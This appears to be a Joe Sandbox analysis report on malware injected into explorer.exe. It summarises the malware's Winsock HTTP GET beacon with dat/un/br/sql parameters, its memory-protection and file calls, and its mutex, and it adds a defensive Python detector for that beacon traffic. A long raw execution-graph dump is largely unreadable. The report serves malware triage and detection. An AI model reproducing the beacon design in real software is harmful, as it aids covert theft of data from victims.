                                            • Instruction ID: 2138fadc6069f323928086e7fffd0551a17735c0200a6a1e2dc448a351d770f1
                                            • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                            • Instruction Fuzzy Hash: FD91C171E202179FEB34DF6DC881ABEBBA5FF44328F24455AEA55E72C0D73889408751
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • String ID: $$@
                                            • API String ID: 0-1194432280
                                            • Opcode ID: 8e93d4e03c4730be67e780d6be4ddca79557c29bdbe04bc7b0f6cb3ecebae372
                                            • Instruction ID: dac24d9e9fce0adc0cf537f2057f806be0cb9592644b0b6551f86a8ba64321b8
                                            • Opcode Fuzzy Hash: 8e93d4e03c4730be67e780d6be4ddca79557c29bdbe04bc7b0f6cb3ecebae372
                                            • Instruction Fuzzy Hash: 47810A71D1026ADBDF358B58CC45BEEB7B8AF49754F0041EAAA19B7240D7709E84CFA0

                                            Execution Graph

                                            Execution Coverage:2.3%
                                            Dynamic/Decrypted Code Coverage:0%
                                            Signature Coverage:4.7%
                                            Total number of Nodes:444
                                            Total number of Limit Nodes:16

                                            Control-flow Graph

Graph of the function at 11269f82 (basic blocks 11269f82-1126a920), drawn on the report page with executed and not-executed blocks. Recoverable from the edge list: the function calls the socket wrapper at 112665b2 (block 1126a068), getaddrinfo (block 1126a117) and the connect wrapper at 11266732 (block 1126a191); it then assembles the request through helpers 1126ad62, 1126ad92, 11267482, 11266e72, 11267042 and repeated calls to 1126b262 and 1126b002; it calls the send wrapper at 112666b2 (block 1126a6ff) and finishes with setsockopt and recv (block 1126a7f4-1126a861). 11269942 (block 1126a0ba), 11266552, 11266382 and 112667b2 are also called.
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4539237631.00000000111A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 111A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_111a0000_explorer.jbxd
                                            Similarity
                                            • API ID: getaddrinforecvsetsockopt
                                            • String ID: Co$&br=$&sql$&un=$: cl$GET $dat=$nnec$ose$tion
                                            • API String ID: 1564272048-1117930895
                                            • Opcode ID: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
                                            • Instruction ID: a55db92c50f2d6510dfbe44a17826096a5d7f21b4e17e864c0e9122f761fec49
                                            • Opcode Fuzzy Hash: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
                                            • Instruction Fuzzy Hash: 1952B134614A498FD719DF68C4847E9B7E5FB54304F60462EC9AFC7182EE34B989CB81
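
The strings attached to this function ("GET ", "dat=", "&un=", "&br=", "&sql", and the pieces "Co", "nnec", "tion", ": cl", "ose", which spell "Connection: close") together with the socket, getaddrinfo, connect, send, setsockopt and recv calls in its graph describe a hand-built HTTP GET beacon over Winsock. As an added example that is not part of the Joe Sandbox report, the Python below checks captured HTTP request text for that shape: a GET whose query string carries the dat, un, br and sql keys, sent with a Connection: close header. The two request samples are constructed for the example; the host, path and parameter values are assumptions, not values observed from this sample, and the check is a triage heuristic, not a signature for a particular family.

```python
from urllib.parse import parse_qs, urlsplit

# Query keys seen as string fragments in the function at 11269f82
# ("dat=", "&un=", "&br=", "&sql"); everything else here is assumed.
BEACON_KEYS = {"dat", "un", "br", "sql"}


def parse_request(raw: bytes):
    """Split a raw HTTP/1.x request into (method, target, headers).

    Returns None when the request line or a header is malformed. Only
    the request line and the header block are examined, and a missing
    final CRLF is tolerated because captures are often truncated.
    """
    head, _, _body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    parts = lines[0].split(b" ")
    if len(parts) != 3 or not parts[2].startswith(b"HTTP/"):
        return None
    headers = {}
    for line in lines[1:]:
        if not line:
            continue
        name, sep, value = line.partition(b":")
        if not sep:
            return None
        headers[name.strip().lower().decode("latin-1")] = value.strip().decode("latin-1")
    return parts[0].decode("latin-1"), parts[1].decode("latin-1"), headers


def beacon_indicators(raw: bytes) -> dict:
    """Report which of the indicators from the dump a request shows."""
    parsed = parse_request(raw)
    if parsed is None:
        return {"parsed": False}
    method, target, headers = parsed
    # keep_blank_values so that an empty "sql=" still counts as the key
    keys = set(parse_qs(urlsplit(target).query, keep_blank_values=True))
    return {
        "parsed": True,
        "get": method == "GET",
        "query_keys": keys & BEACON_KEYS,
        "missing_keys": BEACON_KEYS - keys,
        "connection_close": headers.get("connection", "").lower() == "close",
    }


def looks_like_beacon(raw: bytes) -> bool:
    """True for a GET carrying all four keys with Connection: close."""
    ind = beacon_indicators(raw)
    return bool(ind.get("parsed") and ind["get"]
                and not ind["missing_keys"] and ind["connection_close"])


# Constructed samples for the example; not traffic from this analysis.
SUSPECT = (
    b"GET /assumed/path/?dat=AAAA&un=BBBB&br=CCCC&sql=1 HTTP/1.1\r\n"
    b"Host: example.invalid\r\n"
    b"User-Agent: Mozilla/4.0\r\n"
    b"Connection: close\r\n\r\n"
)
BENIGN = (
    b"GET /search?q=firewall&page=2 HTTP/1.1\r\n"
    b"Host: example.invalid\r\n"
    b"Connection: keep-alive\r\n\r\n"
)

if __name__ == "__main__":
    for name, req in (("suspect", SUSPECT), ("benign", BENIGN)):
        print(name, looks_like_beacon(req), beacon_indicators(req))
```

The indicator dictionary is returned alongside the boolean so that a partial match (three of the four keys, or the keys without Connection: close) can still be surfaced for a human to look at rather than silently dropped.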

                                            Control-flow Graph

Graph of the function at 11269232 (basic blocks 11269232-112698cd). Recoverable from the edge list: the function calls 11269942 in most of its branches, calls NtCreateFile in block 11269410-11269458 and immediately afterwards 11269172, and calls 1126ae92 in block 11269657-1126966b.
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4539237631.00000000111A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 111A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_111a0000_explorer.jbxd
                                            Similarity
                                            • API ID: CreateFile
                                            • String ID: `
                                            • API String ID: 823142352-2679148245
                                            • Opcode ID: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
                                            • Instruction ID: cca2a3760cfbb653d98e1523ea0fea3cfbe66fab0873e9259624352765dd64de
                                            • Opcode Fuzzy Hash: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
                                            • Instruction Fuzzy Hash: 6B225B70B18A0A9FCB49DF28C4956EEB7E5FB58304F50022ED55ED7290EF30A491CB85

                                            Control-flow Graph

Graph of the function at 1126ae12 (basic blocks 1126ae12-1126ae8f): an optional call to 11269942 at 1126ae40, then NtProtectVirtualMemory in block 1126ae45-1126ae6e, after which control continues at either 1126ae70 or 1126ae7d.
                                            APIs
                                            • NtProtectVirtualMemory.NTDLL ref: 1126AE67
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4539237631.00000000111A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 111A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_111a0000_explorer.jbxd
                                            Similarity
                                            • API ID: MemoryProtectVirtual
                                            • String ID:
                                            • API String ID: 2706961497-0
                                            • Opcode ID: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
                                            • Instruction ID: 3e54a9ed3e09a0021f0770d23eb45ce6c20b1f6a873ee0b48d908385491b6242
                                            • Opcode Fuzzy Hash: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
                                            • Instruction Fuzzy Hash: D301B534668B484F8784DF6CD48012AB7E4FBCD314F000B3EE99AC3250EB70C5418742

                                            Control-flow Graph

Graph of the function at 1126ae0a (basic blocks 1126ae0a-1126ae8f), which overlaps the function above: a call to 11269942, then NtProtectVirtualMemory at 1126ae67, then the same split to 1126ae70 or 1126ae7d.
                                            APIs
                                            • NtProtectVirtualMemory.NTDLL ref: 1126AE67
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4539237631.00000000111A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 111A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_111a0000_explorer.jbxd
                                            Similarity
                                            • API ID: MemoryProtectVirtual
                                            • String ID:
                                            • API String ID: 2706961497-0
                                            • Opcode ID: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
                                            • Instruction ID: 1c6dcb808fa3982efd2f24c578235fcdbc618434e69e719d7d13cacf6c5cdacf
                                            • Opcode Fuzzy Hash: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
                                            • Instruction Fuzzy Hash: 1601A734628B884F8745DF2C94411A6B3E5FBCE314F000B3EE99AC3240DB31D5028782

                                            Control-flow Graph

                                            APIs
                                            • ObtainUserAgentString.URLMON ref: 112649A0
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4539237631.00000000111A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 111A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_111a0000_explorer.jbxd
                                            Similarity
                                            • API ID: AgentObtainStringUser
                                            • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                            • API String ID: 2681117516-319646191
                                            • Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                            • Instruction ID: 0bd3cbf970257dd1bb5daf2e3aca5a649efe3523946918ec383a1ed742b80ba1
                                            • Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                            • Instruction Fuzzy Hash: B131D431714A4D8FCB05EFA8C8847EEBBE5FB58209F40022AD85ED7280DE749685C785

                                            Control-flow Graph

                                            APIs
                                            • ObtainUserAgentString.URLMON ref: 112649A0
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4539237631.00000000111A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 111A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_111a0000_explorer.jbxd
                                            Similarity
                                            • API ID: AgentObtainStringUser
                                            • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                            • API String ID: 2681117516-319646191
                                            • Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                            • Instruction ID: 67736e468acdaad2c8a8ccb186bd6b42d3e6a91ce114462ba41c6912a417e3b1
                                            • Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                            • Instruction Fuzzy Hash: 7F219370A14A4E8FCB05DFA9C8847ED7BE5FF58209F40422AD85AD7280DF749685C785

                                            Control-flow Graph

Graph of the function at 11260b66 (basic blocks 11260b66-11260cf6). Recoverable from the edge list: block 11260bbe-11260c22 calls 11267612 and 11269942 twice; block 11260c31-11260cd3 calls 1126bda4, 1126b022, 1126b3e2, 1126b022 and 1126b3e2 again, then CreateMutexW.
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4539237631.00000000111A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 111A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_111a0000_explorer.jbxd
                                            Similarity
                                            • API ID: CreateMutex
                                            • String ID: .dll$el32$kern
                                            • API String ID: 1964310414-1222553051
                                            • Opcode ID: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
                                            • Instruction ID: 31a3884c6c5bb5b84948d1c8ce8c9b40339f92891dd8fb52847222b3437b4137
                                            • Opcode Fuzzy Hash: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
                                            • Instruction Fuzzy Hash: 9F415B74A18A098FDB44EFA8C8D47AD77F4FB58304F00457ACC4ADB295EE349985CB85

                                            Control-flow Graph

                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4539237631.00000000111A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 111A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_111a0000_explorer.jbxd
                                            Similarity
                                            • API ID: CreateMutex
                                            • String ID: .dll$el32$kern
                                            • API String ID: 1964310414-1222553051
                                            • Opcode ID: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
                                            • Instruction ID: 15763fb354e673a551f54afb42231bd39080a73edf135a29738d72289ff25328
                                            • Opcode Fuzzy Hash: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
                                            • Instruction Fuzzy Hash: 20413C74A18A098FDB44EFA8C4D87ED77F4FB58304F00456ACC4ADB295EE349985CB85

                                            Control-flow Graph

Graph of the connect wrapper at 1126672e (basic blocks 1126672e-112667ab): an optional call to 11269942 in block 1126676a, then connect in block 11266788-112667ab.
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4539237631.00000000111A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 111A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_111a0000_explorer.jbxd
                                            Similarity
                                            • API ID: connect
                                            • String ID: conn$ect
                                            • API String ID: 1959786783-716201944
                                            • Opcode ID: d2c20d592f91275318b70c66aa45ff63ae11574d98dcf1710f59c05c574d9bfb
                                            • Instruction ID: e669e9a9dea03db69fc3a023b3454c5711763828edce59d2da749cfb10ec8ae0
                                            • Opcode Fuzzy Hash: d2c20d592f91275318b70c66aa45ff63ae11574d98dcf1710f59c05c574d9bfb
                                            • Instruction Fuzzy Hash: 71015E30618B188FCB84EF1CE088B55B7E0FB59314F1545AED90DCB266CA74D881CBC2

                                            Control-flow Graph

Graph of the connect wrapper at 11266732 (basic blocks 11266732-112667ab), the same code entered a few bytes later: an optional call to 11269942 in block 1126676a, then connect in block 11266788-112667ab.
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4539237631.00000000111A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 111A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_111a0000_explorer.jbxd
                                            Similarity
                                            • API ID: connect
                                            • String ID: conn$ect
                                            • API String ID: 1959786783-716201944
                                            • Opcode ID: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
                                            • Instruction ID: 6b7b1c8903567555a784a9dbfd47876f4a504faf23cf777bd556901148c0774c
                                            • Opcode Fuzzy Hash: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
                                            • Instruction Fuzzy Hash: 70012C70618A1C8FCB88EF5CE088B55B7E0FB59314F1541AEA90DCB266DA74C9818BC2

                                            Control-flow Graph

Graph of the send wrapper at 112666b2 (basic blocks 112666b2-1126672d): an optional call to 11269942 in block 112666e7, then send in block 11266705-1126672d.
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4539237631.00000000111A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 111A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_111a0000_explorer.jbxd
                                            Similarity
                                            • API ID: send
                                            • String ID: send
                                            • API String ID: 2809346765-2809346765
                                            • Opcode ID: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
                                            • Instruction ID: d97510939f7aff9a75bcc4158118803eb31f4bff69d2b8028ab47eef3c06930d
                                            • Opcode Fuzzy Hash: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
                                            • Instruction Fuzzy Hash: D7012570618A5D8FDBC8DF1CE048B2577E0FB58314F1545AED85DCB266DA70D881CB81

                                            Control-flow Graph

Graph of the socket wrapper at 112665b2 (basic blocks 112665b2-1126662b): an optional call to 11269942 in block 112665ec, then socket in block 1126660a-1126662b.
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4539237631.00000000111A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 111A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_111a0000_explorer.jbxd
                                            Similarity
                                            • API ID: socket
                                            • String ID: sock
                                            • API String ID: 98920635-2415254727
                                            • Opcode ID: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
                                            • Instruction ID: 02f297a12d7883113265a7e7327ed638836a97aa5b3671ba78fd6f54a2911a83
                                            • Opcode Fuzzy Hash: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
                                            • Instruction Fuzzy Hash: 81018F30618A1C8FCB84EF1CE048B54BBE0FB59314F1545AEE80ECB266C7B0C981CB82

                                            Control-flow Graph

Graph of the function at 1125e2dd (basic blocks 1125e2dd-1125e40e). Recoverable from the edge list: after a call to 11269942 the function enters block 1125e328-1125e339, which calls SleepEx and loops on itself; the outer loop then dispatches to 11268f12, 1125f432, 1125ee72 and 1125e0f2 before returning to the SleepEx block.
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4539237631.00000000111A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 111A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_111a0000_explorer.jbxd
                                            Similarity
                                            • API ID: Sleep
                                            • String ID:
                                            • API String ID: 3472027048-0
                                            • Opcode ID: 2c485226c71f8ce073f7c86c27236fb263c26e76649b5794a31fce9b42c1bba6
                                            • Instruction ID: ecac26ae2241de25b7ac7a8bdebf2bdfdf009804e657d639decdd5f3fa92f106
                                            • Opcode Fuzzy Hash: 2c485226c71f8ce073f7c86c27236fb263c26e76649b5794a31fce9b42c1bba6
                                            • Instruction Fuzzy Hash: 6D317A74614B5AEBDBD4DF2980882E5F7A1FB44300F54826ECA5DCA107CB30A590CF92

                                            Control-flow Graph

Graph of the function at 1125e412 (basic blocks 1125e412-1125e47d): a call to 11269942, then either a direct return via block 1125e473 or a call to 1126bc9e followed by CreateThread in block 1125e448-1125e472.
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4539237631.00000000111A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 111A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_111a0000_explorer.jbxd
                                            Similarity
                                            • API ID: CreateThread
                                            • String ID:
                                            • API String ID: 2422867632-0
                                            • Opcode ID: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
                                            • Instruction ID: 07abd42f9a0c4096d1dc3a1de0c87da647205d0f858a9c19525ea430e1abae0a
                                            • Opcode Fuzzy Hash: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
                                            • Instruction Fuzzy Hash: 2FF02830228A090FD784EB2CD44163AF3D0FBA8204F40053E994DC3254DE34C5828705
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4537984789.000000000E6D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E6D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_e6d0000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: .dll$32.d$M$S$dll$el32$kern$ll$net.$user$wini
                                            • API String ID: 0-393284711
                                            • Opcode ID: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
                                            • Instruction ID: 44a222de50f5e2eb0a8b25036519e7aeee4a1c08284bcd869e7b2d621ae95868
                                            • Opcode Fuzzy Hash: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
                                            • Instruction Fuzzy Hash: 2AE16A70518F488FCB64EF78D4947AAB7E0FB58301F404A2E95AFC7681DF30A9018B89

                                            Execution Graph

                                            Execution Coverage:1.8%
                                            Dynamic/Decrypted Code Coverage:6.7%
                                            Signature Coverage:0%
                                            Total number of Nodes:623
                                            Total number of Limit Nodes:71
107407->107404 107532 91cfd0 LdrLoadDll RtlAllocateHeap RtlFreeHeap 107407->107532 107533 91d060 107407->107533 107409 9141a7 107411 91cf30 2 API calls 107409->107411 107410->107409 107413 91d060 3 API calls 107410->107413 107412 9141bd 107411->107412 107414 9141fa 107412->107414 107416 91d060 3 API calls 107412->107416 107413->107410 107415 91cf30 2 API calls 107414->107415 107417 914205 107415->107417 107416->107412 107418 91d060 3 API calls 107417->107418 107424 91423f 107417->107424 107418->107417 107421 91cf90 2 API calls 107422 91433e 107421->107422 107423 91cf90 2 API calls 107422->107423 107425 914348 107423->107425 107529 91cf90 107424->107529 107426 91cf90 2 API calls 107425->107426 107427 914352 107426->107427 107428 91cf90 2 API calls 107427->107428 107428->107399 107430 9153a1 107429->107430 107431 914a50 8 API calls 107430->107431 107433 9153b7 107431->107433 107432 91540a 107432->107293 107433->107432 107434 9153f2 107433->107434 107435 915405 107433->107435 107436 91bdc0 2 API calls 107434->107436 107437 91bdc0 2 API calls 107435->107437 107438 9153f7 107436->107438 107437->107432 107438->107293 107539 91ac30 107439->107539 107442 91ac30 LdrLoadDll 107443 91ad8d 107442->107443 107444 91ac30 LdrLoadDll 107443->107444 107445 91ad96 107444->107445 107446 91ac30 LdrLoadDll 107445->107446 107447 91ad9f 107446->107447 107448 91ac30 LdrLoadDll 107447->107448 107449 91ada8 107448->107449 107450 91ac30 LdrLoadDll 107449->107450 107451 91adb1 107450->107451 107452 91ac30 LdrLoadDll 107451->107452 107453 91adbd 107452->107453 107454 91ac30 LdrLoadDll 107453->107454 107455 91adc6 107454->107455 107456 91ac30 LdrLoadDll 107455->107456 107457 91adcf 107456->107457 107458 91ac30 LdrLoadDll 107457->107458 107459 91add8 107458->107459 107460 91ac30 LdrLoadDll 107459->107460 107461 91ade1 107460->107461 107462 91ac30 LdrLoadDll 107461->107462 107463 91adea 107462->107463 107464 91ac30 LdrLoadDll 107463->107464 107465 91adf6 107464->107465 107466 91ac30 LdrLoadDll 
107465->107466 107467 91adff 107466->107467 107468 91ac30 LdrLoadDll 107467->107468 107469 91ae08 107468->107469 107470 91ac30 LdrLoadDll 107469->107470 107471 91ae11 107470->107471 107472 91ac30 LdrLoadDll 107471->107472 107473 91ae1a 107472->107473 107474 91ac30 LdrLoadDll 107473->107474 107475 91ae23 107474->107475 107476 91ac30 LdrLoadDll 107475->107476 107477 91ae2f 107476->107477 107478 91ac30 LdrLoadDll 107477->107478 107479 91ae38 107478->107479 107480 91ac30 LdrLoadDll 107479->107480 107481 91ae41 107480->107481 107482 91ac30 LdrLoadDll 107481->107482 107483 91ae4a 107482->107483 107484 91ac30 LdrLoadDll 107483->107484 107485 91ae53 107484->107485 107486 91ac30 LdrLoadDll 107485->107486 107487 91ae5c 107486->107487 107488 91ac30 LdrLoadDll 107487->107488 107489 91ae68 107488->107489 107490 91ac30 LdrLoadDll 107489->107490 107491 91ae71 107490->107491 107492 91ac30 LdrLoadDll 107491->107492 107493 91ae7a 107492->107493 107494 91ac30 LdrLoadDll 107493->107494 107495 91ae83 107494->107495 107496 91ac30 LdrLoadDll 107495->107496 107497 91ae8c 107496->107497 107498 91ac30 LdrLoadDll 107497->107498 107499 91ae95 107498->107499 107500 91ac30 LdrLoadDll 107499->107500 107501 91aea1 107500->107501 107502 91ac30 LdrLoadDll 107501->107502 107503 91aeaa 107502->107503 107504 91ac30 LdrLoadDll 107503->107504 107505 91aeb3 107504->107505 107506 91ac30 LdrLoadDll 107505->107506 107507 91aebc 107506->107507 107508 91ac30 LdrLoadDll 107507->107508 107509 91aec5 107508->107509 107510 91ac30 LdrLoadDll 107509->107510 107511 91aece 107510->107511 107512 91ac30 LdrLoadDll 107511->107512 107513 91aeda 107512->107513 107514 91ac30 LdrLoadDll 107513->107514 107515 91aee3 107514->107515 107516 91ac30 LdrLoadDll 107515->107516 107517 91aeec 107516->107517 107517->107297 107519 91af60 LdrLoadDll 107518->107519 107520 919edc 107519->107520 107545 4da2df0 LdrInitializeThunk 107520->107545 107521 919ef3 107521->107228 107523->107294 107525 91cf40 107524->107525 107526 91cf46 
107524->107526 107525->107402 107527 91bf90 2 API calls 107526->107527 107528 91cf6c 107527->107528 107528->107402 107530 91bdc0 2 API calls 107529->107530 107531 914334 107530->107531 107531->107421 107532->107407 107534 91cfd0 107533->107534 107535 91bf90 2 API calls 107534->107535 107536 91d02d 107534->107536 107537 91d00a 107535->107537 107536->107407 107538 91bdc0 2 API calls 107537->107538 107538->107536 107540 91ac4b 107539->107540 107541 914e50 LdrLoadDll 107540->107541 107542 91ac6b 107541->107542 107543 914e50 LdrLoadDll 107542->107543 107544 91ad17 107542->107544 107543->107544 107544->107442 107545->107521 107547 4da2c1f LdrInitializeThunk 107546->107547 107548 4da2c11 107546->107548 107547->107303 107548->107303 107550 91af60 LdrLoadDll 107549->107550 107551 91a68c RtlFreeHeap 107550->107551 107551->107306 107553 907eb0 107552->107553 107554 907eab 107552->107554 107555 91bd40 2 API calls 107553->107555 107554->107236 107556 907ed5 107555->107556 107557 907f38 107556->107557 107558 919ec0 2 API calls 107556->107558 107559 907f3e 107556->107559 107563 91bd40 2 API calls 107556->107563 107569 91a5c0 107556->107569 107557->107236 107558->107556 107561 907f64 107559->107561 107562 91a5c0 2 API calls 107559->107562 107561->107236 107564 907f55 107562->107564 107563->107556 107564->107236 107566 908176 107565->107566 107567 91a5c0 2 API calls 107566->107567 107568 90817e 107567->107568 107568->107193 107570 91a5dc 107569->107570 107571 91af60 LdrLoadDll 107569->107571 107574 4da2c70 LdrInitializeThunk 107570->107574 107571->107570 107572 91a5f3 107572->107556 107574->107572 107576 91b5c3 107575->107576 107577 90acf0 LdrLoadDll 107576->107577 107578 909c4a 107577->107578 107578->107199 107580 90b063 107579->107580 107582 90b0e0 107580->107582 107594 919c90 LdrLoadDll 107580->107594 107582->107206 107584 91af60 LdrLoadDll 107583->107584 107585 90f1bb 107584->107585 107585->107209 107586 91a7d0 107585->107586 107587 91af60 LdrLoadDll 107586->107587 107588 
91a7ef LookupPrivilegeValueW 107587->107588 107588->107211 107590 91af60 LdrLoadDll 107589->107590 107591 91a27c 107590->107591 107595 4da2ea0 LdrInitializeThunk 107591->107595 107592 91a29b 107592->107212 107594->107582 107595->107592 107597 90b1f0 107596->107597 107598 90b040 LdrLoadDll 107597->107598 107599 90b204 107598->107599 107599->107146 107601 90af34 107600->107601 107673 919c90 LdrLoadDll 107601->107673 107603 90af6e 107603->107148 107605 90f3ac 107604->107605 107606 90b1c0 LdrLoadDll 107605->107606 107607 90f3be 107606->107607 107674 90f290 107607->107674 107610 90f3d9 107613 90f3e4 107610->107613 107614 91a490 2 API calls 107610->107614 107611 90f402 107611->107152 107612 90f3f1 107612->107611 107615 91a490 2 API calls 107612->107615 107613->107152 107614->107613 107615->107611 107617 90f43c 107616->107617 107693 90b2b0 107617->107693 107619 90f44e 107620 90f290 3 API calls 107619->107620 107621 90f45f 107620->107621 107623 90f469 107621->107623 107625 90f481 107621->107625 107622 90f474 107622->107154 107623->107622 107624 91a490 2 API calls 107623->107624 107624->107622 107626 91a490 2 API calls 107625->107626 107627 90f492 107625->107627 107626->107627 107627->107154 107629 90caa6 107628->107629 107630 90cab0 107628->107630 107629->107163 107631 90af10 LdrLoadDll 107630->107631 107632 90cb4e 107631->107632 107633 90cb74 107632->107633 107634 90b040 LdrLoadDll 107632->107634 107633->107163 107635 90cb90 107634->107635 107636 914a50 8 API calls 107635->107636 107637 90cbe5 107636->107637 107637->107163 107639 90d646 107638->107639 107640 90b040 LdrLoadDll 107639->107640 107641 90d65a 107640->107641 107697 90d310 107641->107697 107643 90908b 107644 90cc00 107643->107644 107645 90cc26 107644->107645 107646 90b040 LdrLoadDll 107645->107646 107647 90cca9 107645->107647 107646->107647 107648 90b040 LdrLoadDll 107647->107648 107649 90cd16 107648->107649 107650 90af10 LdrLoadDll 107649->107650 107651 90cd7f 107650->107651 107652 90b040 LdrLoadDll 
107651->107652 107653 90ce2f 107652->107653 107653->107175 107656 908d14 107654->107656 107726 90f6d0 107654->107726 107667 908f25 107656->107667 107731 9143a0 107656->107731 107658 908d70 107658->107667 107734 908ab0 107658->107734 107661 91cf30 2 API calls 107662 908db2 107661->107662 107663 91d060 3 API calls 107662->107663 107664 908dc7 107663->107664 107665 907ea0 4 API calls 107664->107665 107664->107667 107669 90c7b0 18 API calls 107664->107669 107670 908160 2 API calls 107664->107670 107739 90f670 107664->107739 107743 90f080 21 API calls 107664->107743 107665->107664 107667->107131 107669->107664 107670->107664 107671->107155 107672->107180 107673->107603 107675 90f2aa 107674->107675 107683 90f360 107674->107683 107676 90b040 LdrLoadDll 107675->107676 107677 90f2cc 107676->107677 107684 919f40 107677->107684 107679 90f30e 107687 919f80 107679->107687 107682 91a490 2 API calls 107682->107683 107683->107610 107683->107612 107685 91af60 LdrLoadDll 107684->107685 107686 919f5c 107685->107686 107686->107679 107688 91af60 LdrLoadDll 107687->107688 107689 919f9c 107688->107689 107692 4da35c0 LdrInitializeThunk 107689->107692 107690 90f354 107690->107682 107692->107690 107694 90b2ba 107693->107694 107695 90b040 LdrLoadDll 107694->107695 107696 90b313 107695->107696 107696->107619 107698 90d327 107697->107698 107706 90f710 107698->107706 107702 90d39b 107703 90d3a2 107702->107703 107717 91a2a0 LdrLoadDll 107702->107717 107703->107643 107705 90d3b5 107705->107643 107707 90f735 107706->107707 107718 9081a0 107707->107718 107709 90d36f 107714 91a6e0 